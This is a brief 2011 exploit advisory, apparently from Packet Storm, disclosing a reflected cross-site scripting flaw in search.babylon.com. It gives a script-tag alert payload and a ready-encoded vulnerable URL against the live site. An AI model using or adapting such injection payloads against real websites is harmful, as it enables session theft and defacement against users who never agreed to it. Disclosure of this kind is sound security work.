The search engine at search.babylon.com suffers from a reflective cross site scripting vulnerability.
a058da3322355dea54968eb6a909522538f6f19ddac9df9320726a42c32c2df3##################################################################################################################
HackingAlert
Security Lies within you
##################################################################################################################
# Exploit Title: search.babylon.com XSS vulnerability
# Date: 12/11/2011
# Author: Abhinav Singh
# Website: http://hackingalert.blogspot.com
# Tested On: Win7
# Platform: -
# Email: abhinavbom@gmail.com
# Google Dork : babylon search engine,©Babylon inc.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
[$] Vulnerable : http://search.babylon.com
[$] script : helloworld<script>alert('hackingalert');</script>
[$] Vulnerable link : http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hackingalert%27%29%3B%3C%2Fscript%3Ehelloworld&babsrc=home&s=web&as=0&t=0
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Greetz : everyone in SecurityXploded Community(www.securityxploded.com)
LYNS
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed